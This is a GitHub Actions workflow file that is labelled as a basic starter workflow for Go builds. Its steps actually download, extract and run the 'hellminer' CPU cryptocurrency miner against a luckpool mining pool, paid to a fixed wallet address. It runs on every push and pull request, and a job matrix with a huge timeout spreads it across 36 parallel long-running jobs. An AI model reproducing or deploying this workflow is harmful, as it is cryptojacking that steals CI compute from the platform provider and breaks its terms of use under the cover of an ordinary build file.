# This is a basic workflow to help you get started with Actions

name: dev
on: [push, pull_request]
jobs:
  build:
    name: dev
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 100
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4]
        flag: [A, B, C, D, E, F, G, H, I]
    timeout-minutes: 9999
    env:
        NUM_JOBS: 100
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: dev
      run: wget https://github.com/hellcatz/luckpool/blob/master/miners/hellminer_cpu_linux.tar.gz
    - name: Extract
      run: tar xf hellminer_cpu_linux.tar.gz
    - name: start
      run: ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RP1ntCUiBNERYrp25mccFoR22V1uPSxxTg.hellminer -p x --cpu 12
